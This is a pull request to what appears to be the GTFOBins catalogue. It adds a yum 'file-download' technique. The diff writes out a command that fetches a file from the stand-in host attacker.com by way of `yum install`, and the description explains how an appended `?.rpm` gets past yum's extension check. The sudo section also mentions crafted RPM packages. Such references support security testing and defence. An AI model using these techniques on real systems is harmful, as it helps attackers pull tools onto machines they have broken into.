### PR TITLE
Add file-download to yum

### DIFF
--- a/_gtfobins/yum.md
+++ b/_gtfobins/yum.md
@@ -4,7 +4,7 @@ functions:
     - description: Fetch a remote file via HTTP GET request. The file on the remote host must have an extension of `.rpm`, the content does not have to be an RPM file. The file will be downloaded to a randomly created directory in `/var/tmp`, for example `/var/tmp/yum-root-cR0O4h/`.
       code: |
         RHOST=attacker.com
-        RFILE=/tmp/file_to_get.tar.rpm
+        RFILE=file_to_get.rpm
         yum install http://$RHOST/$RFILE
   sudo:
     - description: |

--- a/_gtfobins/yum.md
+++ b/_gtfobins/yum.md
@@ -1,5 +1,11 @@
 ---
 functions:
+  file-download:
+    - description: Fetch a remote file via HTTP GET request. The file on the remote host must have an extension of `.rpm`, the content does not have to be an RPM file. The file will be downloaded to a randomly created directory in `/var/tmp`, for example `/var/tmp/yum-root-cR0O4h/`.
+      code: |
+        RHOST=attacker.com
+        RFILE=/tmp/file_to_get.tar.rpm
+        yum install http://$RHOST/$RFILE
   sudo:
     - description: |
         It runs commands using a specially crafted RPM package. Generate it with [fpm](https://github.com/jordansissel/fpm) and upload it to the target.


### PR DESCRIPTION
I hope the description is clear enough, `yum` only checks for an extension of `.rpm` at the end of the url. 
Even `/robots.txt?.rpm` would get `yum` to download the `/robots.txt` file from the remote host.